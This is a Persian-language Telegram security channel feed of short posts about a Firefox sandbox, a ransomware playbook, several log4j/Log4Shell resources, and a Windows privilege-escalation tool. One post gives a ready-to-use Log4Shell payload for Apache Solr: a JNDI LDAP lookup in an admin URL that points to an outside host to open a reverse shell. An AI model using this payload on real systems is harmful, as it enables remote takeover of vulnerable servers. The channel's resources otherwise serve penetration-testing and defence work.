امنیت اطلاعات
850 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
نسخه ی ۹۵ مرورگر فایرفاکس به سندباکس جدید با نام RLBox مجهز شد.

این سندباکس قابلیت ایزوله کردن ماژولها و کامپوننت های مرورگر برای جلوگیری از آسیب زدن و سوء استفاده از آنها توسط دیگر اجزاء مرورگر را دارد.

https://thehackernews.com/2021/12/latest-firefox-95-includes-rlbox.html


#firefox


@sec_nerd
مرکز امنیت سایبری کانادا داکیومنت جالبی از نحوه ی رخ دادن حملات باج افزاری منتشر کرده


https://cyber.gc.ca/en/guidance/ransomware-playbook-itsm00099


#ransomware


@sec_nerd
apache solr EXP log4j

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json


#log4j


@sec_nerd
اگر تاحالا در مورد log4j و اکسپلویتش نخوندید این مطلب خوبیه

https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/


#log4j


@sec_nerd
افزونه ی burpsuite برای آسیب پذیری log4j

https://github.com/silentsignal/burp-log4shell


#log4j
#burpsuite

@sec_nerd
بدست آوردن نسخه ی جاوا برای تشخیص آسیب پذیر بودن در برابر حمله ی log4shell
با استفاده از برپ

لیست هدرها
https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/http-request-headers/http-request-headers-fields-large.txt

#log4j

@sec_nerd
اپلیکیشن جاوایی آسیب پذیر در برابر حمله ی log4shell

https://github.com/tothi/log4shell-vulnerable-app


#log4j


@sec_nerd
بالا بردن سطح دسترسی در ویندوز با استفاده از ابزار MultiPotato

https://github.com/S3cur3Th1sSh1t/MultiPotato


#windows
#privesc


@sec_nerd
👍4